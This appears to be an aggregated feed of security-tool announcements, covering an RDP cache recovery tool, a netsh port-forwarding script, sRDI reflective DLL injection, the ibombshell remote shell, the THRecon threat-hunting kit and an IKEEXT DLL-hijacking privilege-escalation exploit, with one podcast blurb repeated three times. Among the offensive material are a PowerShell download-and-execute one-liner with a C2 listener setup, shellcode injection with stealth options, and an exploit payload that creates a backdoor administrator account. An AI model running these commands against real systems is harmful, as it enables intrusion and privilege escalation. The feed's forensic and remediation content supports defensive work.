Remote Desktop Caching – Tool To Recover Old RDP (mstsc) Session Information In The Form Of Broken PNG Files

This tool allows one to recover old RDP (mstsc) session information in the form of broken PNG files. These PNG files allows Red Team member to extract juicy information such as LAPS passwords or any sensitive information on the screen. Blue Team member can reconstruct PNG files to see what an attacker did on a compromised host. It is extremely useful for a forensics team to extract timestamps after an attack on a host to collect evidences and perform further analysis.ScreenshotsOn the first run of the Remote-Desktop-Caching using python.exe remotecache.py user will get options as below: Using Option 1 and Option 2 user can know the current session execution policy and set it to Bypass which executes the rdpcache.ps1 PowerShell script. USing Option 3 user can list the cached binary files which is going to be used to reconstruct PNG files.Choosing Option 4: Starts analyzing cache files and reconstruction process. This option creates a folder in user C drive with a name of Recovered_RDP_SessionsSensitive information is recovered from these binary files in the form of broken PNG images. Managed to recover LAPS password, Attacker IP address and malicious file names. It also reveals some of the crucial information about attacker activities on a compromised host. For forensics team timestamp is revealed in most of these recovered images.How do I use this?- git clone https://github.com/Viralmaniar/Remote-Desktop-Caching-.git- python.exe remotecache.pyQuestions?Twitter: https://twitter.com/maniarviral LinkedIn: https://au.linkedin.com/in/viralmaniarDownload Remote-Desktop-Caching

Link: http://feedproxy.google.com/~r/PentestTools/~3/VmAcD0fasMY/remote-desktop-caching-tool-to-recover.html

Win-PortFwd – Powershell Script To Setup Windows Port Forwarding Using Native Netsh Client

Powershell script to setup windows port forwarding using native netsh client.Install:git clone https://github.com/deepzec/Win-PortFwd.gitUsage:.\win-portfwd.ps1orpowershell.exe -noprofile -executionpolicy bypass -file .\win-portfwd.ps1Note: This script require admin privileges to run, this script will automatically try to elevate the privilges if you are running this script under normal user privileges.Download Win-PortFwd

Link: http://feedproxy.google.com/~r/PentestTools/~3/SoNwYOjrkQE/win-portfwd-powershell-script-to-setup.html

Venmo, Oracle, & Linux – Application Security Weekly #25

Venmo caught publishing all transactions publicly, Oracle releases critical patches, Microsoft releases PowerShell Core for Linux, Health insurers are vacuuming up details about you, changing your screen to Grayscale can help fight phone addiction, when to ‘purchase’ a solution to your cybersecurity problem, & more on this episode of Application Security Weekly! Bugs, Breaches, and […]
The post Venmo, Oracle, & Linux – Application Security Weekly #25 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/Hj0R0MfkEGo/

Venmo, Oracle, & Linux – Application Security Weekly #25

Venmo caught publishing all transactions publicly, Oracle releases critical patches, Microsoft releases PowerShell Core for Linux, Health insurers are vacuuming up details about you, changing your screen to Grayscale can help fight phone addiction, when to ‘purchase’ a solution to your cybersecurity problem, & more on this episode of Application Security Weekly! Bugs, Breaches, and […]
The post Venmo, Oracle, & Linux – Application Security Weekly #25 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/Hj0R0MfkEGo/

sRDI – Shellcode Implementation Of Reflective DLL Injection

sRDI allows for the conversion of DLL files to position independent shellcode.Functionality is accomplished via two components:C project which compiles a PE loader implementation (RDI) to shellcodeConversion code which attaches the DLL, RDI, and user data together with a bootstrapThis project is comprised of the following elements:ShellcodeRDI: Compiles shellcode for the DLL loaderNativeLoader: Converts DLL to shellcode if neccesarry, then injects into memoryDotNetLoader: C# implementation of NativeLoaderPython\ConvertToShellcode.py: Convert DLL to shellcode in placePython\EncodeBlobs.py: Encodes compiled sRDI blobs for static embeddingPowerShell\ConvertTo-Shellcode.ps1: Convert DLL to shellcode in placeFunctionTest: Imports sRDI C function for debug testingTestDLL: Example DLL that includes two exported functions for call on Load and afterThe DLL does not need to be compiled with RDI, however the technique is cross compatiable.Use Cases / ExamplesBefore use, is recommend to you become familiar with Reflective DLL Injection and it’s purpose.Convert DLL to shellcode using pythonfrom ShellcodeRDI import *dll = open(“TestDLL_x86.dll", ‘rb’).read()shellcode = ConvertToShellcode(dll)Load DLL into memory using C# loaderDotNetLoader.exe TestDLL_x64.dllConvert DLL with python script and load with Native EXEpython ConvertToShellcode.py TestDLL_x64.dllNativeLoader.exe TestDLL_x64.binConvert DLL with powershell and load with Invoke-ShellcodeImport-Module .\Invoke-Shellcode.ps1Import-Module .\ConvertTo-Shellcode.ps1Invoke-Shellcode -Shellcode (ConvertTo-Shellcode -File TestDLL_x64.dll)Stealth ConsiderationsThere are many ways to detect memory injection. The loader function implements two stealth improvments on traditional RDI:Proper Permissions: When relocating sections, memory permissions are set based on the section characteristics rather than a massive RWX blob.PE Header Cleaning (Optional): The DOS Header and DOS Stub for the target DLL are completley wiped with null bytes on load (Except for e_lfanew). This can be toggled with 0x1 in the flags argument for C/C#, or via command line args in Python/Powershell.BuildingThis project is built using Visual Studio 2015 (v140) and Windows SDK 8.1. The python script is written using Python 3.The Python and Powershell scripts are located at:Python\ConvertToShellcode.pyPowerShell\ConvertTo-Shellcode.ps1After building the project, the other binaries will be located at:bin\NativeLoader.exebin\DotNetLoader.exebin\TestDLL_.dllbin\ShellcodeRDI_.binDownload sRDI

Link: http://feedproxy.google.com/~r/PentestTools/~3/L7k0Is7EfEY/srdi-shellcode-implementation-of.html

Venmo, Oracle, & Linux – Application Security Weekly #25

Venmo caught publishing all transactions publicly, Oracle releases critical patches, Microsoft releases PowerShell Core for Linux, Health insurers are vacuuming up details about you, changing your screen to Grayscale can help fight phone addiction, when to ‘purchase’ a solution to your cybersecurity problem, & more on this episode of Application Security Weekly! Bugs, Breaches, and […]
The post Venmo, Oracle, & Linux – Application Security Weekly #25 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/MA6OLXd0dO4/

Ibombshell – Dynamic Remote Shell

ibombshell is a tool written in Powershell that allows you to have a prompt at any time with post-exploitation functionalities (and in some cases exploitation). It is a shell that is downloaded directly to memory providing access to a large number of pentesting features. These functionalities can be downloaded directly to memory, in the form of a Powershell function. This form of execution is known as everywhere.In addition, ibombshell provides a second execution mode called Silently, so the pentester can execute an instance of ibombshell (called warrior). The compromised computer will be connected to a C2 panel through HTTP. Therefore, it will be possible to control the warrior and be able to load functions in memory that help the pentester. This is happening whithin the post-exploitation phase.PrerequisitiesTo run ibombshell everywhere it is mandatory to have PowerShell 3.0 or higher. For operating systems other than Windows you can read more about this in the PowerShell GitHub – PowerShell for every system!.To run the ibombshell silently mode you need python 3.6 and some python libraries. You can install this with:cd ibombshell\ c2/ pip install -r requirements.txt Note: ibombshell C2 works in python 3.X. Make sure you run a pip relative to this version.Usageibombshell has two execution modes:ibombshell everywhereTo load ibombshell simply run on PowerShell:iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console’) Now you can run the downloaded ibombshell console running:console ibombshell silently modeThis version allows you to run the ibombshell console and remotely control it from the C2 panel created in python. To run this version, first you must launch the console process in powershell:iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console’) On ibombshell C2 path, prepare the C2:python3 ibombshell.py And create the listener where the warriors will connected:iBombShell> load modules/listener.py [+] Loading module… [+] Module loaded! iBombShell[modules/listener.py]> run The default listener port is 8080. Finally you can launch the console in silently mode on the host to get remote control:console -Silently -uriConsole http://[ip or domain]:[port] ibombshell C2 schemeThe basic operation of the ibombshell control panel follows the following scheme: ibombshell C2 | | | newibombshell | +———————>| –+ register | |<--+ from IP | get functions | | and instructions | +--------------------->| | | | send functions | | and instructions | execute +– |<———————+ +–>| | | results | +———————>| | | DockerWe have created a docker container with everything you need to make it works. Run this command from Dockerfile location.sudo docker build -t “ibombshell" . sudo docker run -it ibombshell Example videosSome example videos…iBombShell: PoC Warrior + Bypass UAC + Pass the hashiBombShell: macOSibombshell: Extracting Private SSH Keys on Windows 10iBombShell: PoC savefunctionsDownload Ibombshell

Link: http://feedproxy.google.com/~r/PentestTools/~3/9atiVxsUoj8/ibombshell-dynamic-remote-shell.html

THRecon – Threat Hunting Reconnaissance Toolkit

Collect endpoint information for use in incident response triage / threat hunting / live forensics using this toolkit. When a security alert raises concern over a managed system, this toolkit aims to empower the analyst with as much relevant information as possible to help determine if a compromise occurred.Alternatively, the output of this tool may be ingested into an analysis tool like ELK, Graylog, or Splunk for stack-counting and other analysis techniques.Requires Powershell 5.0 or above on the “scanning" device.Requires Powershell 3.0 or higher on target systems (2.0 may be adequate in some cases).Information CollectedLinked to Hunt Use Cases Host Info Processes* Services Autoruns Drivers ARP DLLs* EnvVars Hosts File ADS DNS Strings* Users & Groups Ports Select Registry Hotfixes Handles* Sofware Hardware Event Logs Net Adapters Net Routes Sessions Shares Certificates Scheduled Tasks TPM Bitlocker Recycle Bin User Files * Info pulled from current running processes or their executables on disk.Quick InstallRun this command in Powershell with git installed, then open a new Powershell session.git clone https://github.com/TonyPhipps/THRecon C:\Users\$env:UserName\Documents\WindowsPowerShell\Modules\THReconWithout git… make the folder, then drop all the contents of this project into it. Then open a new Powershell session.mkdir C:\Users\$env:UserName\Documents\WindowsPowerShell\Modules\THRecon\Quick Test UseTo run a "quick" scan on your own system, you will need to create a blank folder, then run the cmdlet within that folder, since output defaults to the current working directory.mkdir c:\temp\cd c:\temp\Invoke-THR -QuickTroubleshootingInstalling a Powershell ModuleIf your system does not automatically load modules in your user profile, you may need to import the module manually.cd C:\Users\$env:UserName\Documents\WindowsPowerShell\Modules\THRecon\Import-Module THRecon.psm1ScreenshotsOutput of Command "Invoke-THR"Output FilesDownload THRecon

Link: http://feedproxy.google.com/~r/PentestTools/~3/KOMA6v97YXM/threcon-threat-hunting-reconnaissance.html

Ikeext-Privesc – Windows IKEEXT DLL Hijacking Exploit Tool

This tool is intended for automatically detecting and exploiting the IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL vulnerability.  DescriptionA major weakness is present in Windows Vista, 7, 8, Server 2008, Server 2008 R2 and Server 2012, which allows any authenticated user to gain system privileges under certain circumstances.In Windows there is a service called IKEEXT (IKE and AuthIP IPsec Keyring Modules), which runs as SYSTEM and tries to load a DLL that doesn’t exist. The default DLL search order of Windows includes several system directories and ends with PATH folders. To put it simple, if one of these folders is configured with weak permissions, any authenticated user can plant a malicious DLL to execute code as SYSTEM and thus elevate his/her privileges.IKEEXT trying to load ‘wlbsctrl.dll’:UsageThis PowerShell script consists of 2 Cmdlets:Invoke-IkeextCheck – Only checks whether the machine is vulnerable.Invoke-IkeextExploit – If the machine is vulnerable, exploit it by dropping a specifically crafted DLL to the first weak folder.DetectionThe Invoke-IkeextCheck Cmdlet performs the following checks:OS version – If the OS is Windows Vista/7/8 then the machine is potentially vulnerable.IKEEXT status and start type – If the service is enabled, the machine is potentially vulnerable (default).PATH folders with weak permissions – If at least one folder is found, the machine is potentially vulnerable.Is wlbsctrl.dll already present in some system folder (i.e. a folder where DLLs can be loaded from)? – If wlbsctrl.dll doesn’t exist, the machine is potentially vulnerable (default).Syntax:Invoke-IkeextCheck [-Verbose] Example:PS C:\temp> . .\Ikeext-Privesc.ps1PS C:\temp> Invoke-IkeextCheck -VerboseExploitIf the machine is vulnerable, the Invoke-IkeextExploit Cmdlet will perform the following: Depending on the IKEEXT start type:AUTO – The exploit files will be dropped to the first weak PATH folder, provided that the switch ‘-Force’ was set in the command line (safety override).MANUAL – The exploit files will be dropped to the first weak PATH folder. Then, the service start will be triggered by trying to open a dummy VPN connection (using rasdial). The following exploit files will be dropped to the first vulnerable folder:wlbsctrl.dll – A specifically crafted DLL (32 & 64 bits), that starts a new CMD process and execute a BATCH file.wlbsctrl_payload.bat – The BATCH file that will be executed. BATCH payload:Default – A default BATCH payload is included in this script. It will use net user and net localgroup to create a new user (hacker with password SuperP@ss123) and add it to the local administrators group (the name of the group is automatically retrieved by the script).Custom – A custom set of commands can be specified using the parameter -Payload .\Path\To\File.txt and a file containing one command per line. Log file – Each payload command’s ouput is redirected to a log file located in the same folder as the DLL’s. Its name will be something like wlbsctrl_xxxxxxxx.txt. So if this file is not created, it means that the payload was not executed.Syntax:Invoke-IkeextExploit [-Verbose] [-Force] [[-Payload] ]Example:PS C:\temp> . .\Ikeext-Privesc.ps1PS C:\temp> Invoke-IkeextExploitCreditsHigh-Tech Bridge – Frédéric Bourla, who initially disovered the vulnerability and disclosed it on October 9, 2012. – https://www.htbridge.com/advisory/HTB23108RemediationFirst of all, it’s important to note that this vulnerability was patched in Windows 8.1 and above. In these versions of Windows, wlbsctrl.dll search is limited to C:\Windows\System32\.If you’re stuck with Windows 7 / Server 2008R2 because of compatibility issues for example, several counter measures can be applied:PATH folders with weak permissions – Some applications are installed directly in C:\ and add themselves to the PATH environment variable. By default, folders created in C:\ are writable by any authenticated user so make sure to drop these privileges.Disable IKEEXT – In most cases, IKEEXT could simply be disabled by applying a GPO. This can be a good solution for servers but it is not advised for workstations.Deploy you own DLL – Deploying a dummy wlbsctrl.dll in C:\Windows\System32\ for example is an efficient solution since this directory has a higher priority than PATH folders.Download Ikeext-Privesc

Link: http://feedproxy.google.com/~r/PentestTools/~3/RauB3rWqdtA/ikeext-privesc-windows-ikeext-dll.html